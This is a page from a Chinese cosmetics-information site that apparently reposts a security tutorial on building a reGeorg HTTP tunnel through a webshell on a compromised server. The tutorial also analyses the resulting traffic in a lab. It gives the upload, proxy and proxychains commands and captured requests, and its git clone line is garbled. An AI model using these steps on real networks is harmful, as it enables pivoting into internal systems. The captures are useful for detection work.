化妆品成分查询与安全分析及排行榜综合网站
化妆品排行榜
推荐品牌
SK-Ⅱ 兰蔻 欧莱雅 玉兰油 百雀羚 施华蔻 兰蔻 瑷尔博士
国际品牌TOP
兰蔻(LANCOME)
赫莲娜(HELENA RUBINSTEIN)
海蓝之谜(LA MER)
香奈儿(Chanel)
资生堂(Shiseido)
倩碧(Clinique)
娇韵诗(CLARINS)
国货品牌TOP
珀莱雅(PROYA)
薇诺娜(WINONA)
自然堂(CHANDO)
润百颜(BIOHYALUX)
玉泽(Dr.Yu)
百雀羚(PECHOIN)
欧诗漫(OSM)
溪木源(Simpcare)
最新品牌活动
水之蔻(水之蔻细节脱毛膏2件9折)
丸美(12.12宠粉盛典 爆款不止买1送1)
滋源(持证防脱 秀发蓬松抢!爆款第2件0元)
【美妆品牌大全】
淘宝 京东 唯品会
美妆分类
化妆品查询
成分查询
备案查询
批号查询
好价爆料
美妆资讯
排行榜
  1. 首页 >
  2. 美妆资讯 >
  3. 美妆 >

  1. reGeorg搭建HTTP隧道和流量分析
美妆资讯
reGeorg搭建HTTP隧道和流量分析
2023-08-05
#隧道
#流量

reGeorg介绍

reGeorg 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。

reGeorg是reDuh的继承者,利用了会话层的socks5协议,相比较于reDuh效率更高一些。

关于通过reGeorg建立HTTP隧道的作用体现在,当我们能通过外网访问服务器A,但是我们并不能与位于内网的主机交互,这时reGeorg就派上了用场,假设此时我们拿到了服务器A的webshell,但是该内网主机的icmp、dns、tcp和udp协议等都不能出网,唯一的数据通道是webshell搭建正向代理。

所以在公网能访问的服务器A上安装reGeorg,它就在攻击者与内网主机之间充当一个转发的角色,从而达到攻击者与内网的信息交互。

reGorg下载地址

git clone //p1-tt.byteimg.com/origin/pgc-image/f8f0411cc3af4bf58adea917e3105599.jpg" style="width: 650px;">

环境

一台vps做受害服务端A IP:182.x.x.x一台docker 部署在受害者机上,里面搭建了一个tomcat,开放了8080端口另外一台vps ip 81.x.x.x 做攻击者,建立http隧道reGeorg 建立http隧道的工具

搭建过程

1、在已经getshell的受害者服务器上的http服务器的web根目录上传一个tunnel.jsp传完后,

测试是否可以访问到

curl http://182.x.x.x:8080/tunnel.jsp

服务器返回Georg says, All seems fine

服务器端配置完成

2、在攻击者机子上,下载reGeorg运行脚本,设置一个端口3333作为http隧道的端口

python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp

3、打开kali攻击机的proxychain设置,设置一下代理。将代理设置为vps的ip的3333端口

vim/etc/proxychains.conf\n在最后添加一条\nsocks5 81.x.x.x 3333

在kali上通过代理访问内网的服务器

proxychains curlhttp://172.17.0.2/login.php

成功访问到内网搭建完成

流量分析

kali

在kali上抓包,然后访问内网,tcpdump抓包,分析流量

tcpdump -ieth0 -wkali.pcap

然后打开wireshark追踪tcp流,看流量

...............P.........PGET /login.php HTTP/1.1\nHost: 172.17.0.2\nUser-Agent: curl/7.68.0\nAccept: */*\nHTTP/1.1 200 OK\nDate: Thu, 17 Dec 2020 16:39:09 GMT\nServer: Apache/2.4.7 (Ubuntu)\nX-Powered-By: PHP/5.5.9-1ubuntu4.25\nSet-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\nCache-Control: no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/; httponly\nSet-Cookie: security=impossible; httponly\nVary: Accept-Encoding\nContent-Length: 1567\nContent-Type: text/html;charset=utf-8\n<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Strict//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>

serverA

在serverA上抓包第一个流可以看到服务器A作为跳板,表明服务器与哪台内网主机的哪个端口连接cmd=connecttarget=172.17.0.2 目标内网ipport=80 端口为80

POST http://182.x.x.x:8080/tunnel.jsp?\ncmd=connect&target=172.17.0.2&port=80 HTTP/1.1\nHost: 182.x.x.x:8080\nAccept-Encoding: identity\nContent-Length: 0\nX-CMD: CONNECT\nX-PORT: 80\nX-TARGET: 172.17.0.2\nUser-Agent: python-urllib3/1.26.2\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nSet-Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly\nX-STATUS: OK\nContent-Type: text/html\nContent-Length: 0\nDate: Thu, 17 Dec 2020 16:44:45 GMT

下一条流cmd=read,代表是去访问内网的内容

Accept-Encoding: identity请求的HTTP头通告其内容编码,只要没有被明确禁止

服务器就不能发回406 Not Acceptable错误

响应包头:Transfer-Encoding: chunked代表是分块传输

POST /tunnel.jsp?cmd=read HTTP/1.1\nHost: 182.x.x.x:8080\nAccept-Encoding: identity\nContent-Length: 0\nX-CMD: READ\nCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly\nConnection: Keep-Alive\nUser-Agent: python-urllib3/1.26.2\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nX-STATUS: OK\nContent-Type: text/html\nTransfer-Encoding: chunked\nDate: Thu, 17 Dec 2020 16:44:45 GMT

接下来这条流就是cmd=forward,转发到内网

POST /tunnel.jsp?cmd=forward HTTP/1.1\nHost: 182.92.73.106:8080\nAccept-Encoding: identity\nContent-Length: 83\nContent-Type: application/octet-stream\nX-CMD: FORWARD\nCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly\nConnection: Keep-Alive\nUser-Agent: python-urllib3/1.26.2\nGET /login.php HTTP/1.1\nHost: 172.17.0.2\nUser-Agent: curl/7.68.0\nAccept: */*\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nX-STATUS: OK\nContent-Type: text/html\nContent-Length: 0\nDate: Thu, 17 Dec 2020 16:44:45 GMT

最后就是cmd=disconnect关闭连接

POST /tunnel.jsp?cmd=disconnect HTTP/1.1\nHost: 182.x.x.x:8080\nAccept-Encoding: identity\nX-CMD: DISCONNECT\nCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly\nUser-Agent: python-urllib3/1.26.2\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nX-STATUS: OK\nContent-Type: text/html\nContent-Length: 0\nDate: Thu, 17 Dec 2020 16:44:45 GMT

内网服务器

在内网服务器上抓包,看到服务器A向内网请求了login.php

GET /login.php HTTP/1.1\nHost: 172.17.0.2\nUser-Agent: curl/7.68.0\nAccept: */*\nHTTP/1.1 200 OK\nDate: Thu, 17 Dec 2020 16:53:17 GMT\nServer: Apache/2.4.7 (Ubuntu)\nX-Powered-By: PHP/5.5.9-1ubuntu4.25\nSet-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\nCache-Control: no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/; httponly\nSet-Cookie: security=impossible; httponly\nVary: Accept-Encoding\nContent-Length: 1567\nContent-Type: text/html;charset=utf-8\n<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Strict//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>\n<html xmlns=http://www.w3.org/1999/xhtml>

总结

通过整个http隧道的建立过程的流量分析,可以看到起初是通过tunnel.jsp,connect内网指定ip的指定端口,然后read读取,通告其内容编码为identity,采用分块传输,最后disconnect关闭连接

版权声明:CosMeDna所有作品(图文、音视频)均由用户自行上传分享,仅供网友学习交流。若您的权利被侵害,请联系删除!

本文链接://www.cosmedna.com/article/567438783.html

相关推荐
2023-08-05
泥岩隧道变形监控量测分析
2023-08-05
基于激光测距的隧道自动监控量测仪器应用研究
2023-08-05
reGeorg搭建HTTP隧道和流量分析
2023-08-05
秋冬季豆沙色眼妆这样画,也太太太太好看了吧
2023-08-05
学生党福利!十年化妆师良心安利,性价比超高的化妆品不超50元
2023-08-05
菊外人仿妆|红着脸蛋的102女孩
2023-08-05
会让直男疯狂夸奖的眼影是哪些!
2023-08-05
好看显瘦又时髦的婚纱照旅拍妆容指南,三亚婚纱摄影哪家靠谱呢
2023-08-05
具荷拉梦幻眼妆仿妆
2023-08-05
日系软妹子眼镜妆
2023-08-05
花样ins眼妆别致吸睛,李圣经彩钻泪妆气质满分
2023-08-05
卡乐泡泡也来抢钱啦!神仙土豆泥眼影,妹子们又要吃土了啊
猜你喜欢
BURBERRY 彩妆新品LIP &amp;amp; CHEEK BLOOM 炫彩唇颊霜 缤纷上市
2023-08-05
蜜汁阿拉伯 之 阿拉伯之眼
2023-08-05
圣诞彩妆年终大盘点来咯,总有一款合你心意
2023-08-05
宋祖儿越来越大胆,画“猫眼妆”也不怕显老气,意外高级有气场
2023-08-05
眼镜妹也有春天-手把手教你画对“眼镜妆”
2023-08-05
戛纳电影节75周年,今年刮起性感风暴
2023-08-05
李佳琦9月2日直播预告
2023-08-05
这三个春季限定彩妆太好看了!想买!第三个已经断货了!
2023-08-05
日本上半年COSME大赏颁出 TOP10有9个都是彩妆
2023-08-05
李沁的“夜光裤”真的绝了,白天也遮不住,手臂都像沾了荧光粉
2023-08-05
眼睛干涩不适?一招帮你解决
2023-08-05
成都医美月 ▏和又柔又飒的她比起来,张天爱、范冰冰只能算东施效颦强凹攻气
2023-08-05
比化妆跟重要的是卸妆
2023-08-05
安瓶等于“新世界”?真的可以一夜回春吗?
2023-08-05
别傻傻等眼角有皱纹了还不知道用眼霜
2023-08-05
女生涂眼霜时,要记住这4个&amp;quot;不要&amp;quot;,不然眼周细纹会越来越多
2023-08-05
为什么你比同龄人要显老?都是黑眼圈惹的祸!
2023-08-05
双11优惠汇总,要领券的赶紧了
2023-08-05
这些眼霜有效改善暗沉,深透修护滋养,让你的眼部肌肤更紧致
2023-08-05
日本护肤品有哪些特点
2023-08-05
细说橄榄油分类-小百说橄榄油知识
2023-08-05
更多资讯>>
最新查询
DNA
爱多康 温和保湿润肤液ATOPALM Lotion国妆备进字J20167072
DNA
xixi 浪漫之吻唇膏(X-1728)粤G妆网备字2017091693
DNA
Antichi Profumi绣球叶精华丝滑护发素苏G妆网备字2021002146
DNA
郑智凤草本颐养油闽G妆网备字2019006073
DNA
洋妃焕彩肌底套 臻颜焕彩赋活膜+调肤修颜液粤G妆网备字2021748509
DNA
古璟妍雪颜焕肤修护水粤G妆网备字2021030818
DNA
LEVIKO伊维可净澈樱花泥膜粤G妆网备字2021748104
DNA
瑾溪玻尿酸补水液粤G妆网备字2021572093
DNA
安妮仙羽蛇油护手霜粤G妆网备字2020219205
DNA
莱瑟美氨基酸洁面慕斯粤G妆网备字2022105765
DNA
魅三生草本植萃净颜精华液粤G妆网备字2023076555
DNA
Rivi蓬松净透泡泡洗发水苏G妆网备字2022007952
DNA
于月仙香秀之恋健康养发洗发乳粤G妆网备字2017074279
DNA
漾妆玻尿酸保湿洗面奶粤G妆网备字2016071168
DNA
薇安琪粉色旅程套盒(粉色旅程香水)粤G妆网备字2022027890
COSMEDNA.COM
手机版 查询指引 意见建议 隐私保障 联系我们 XML地图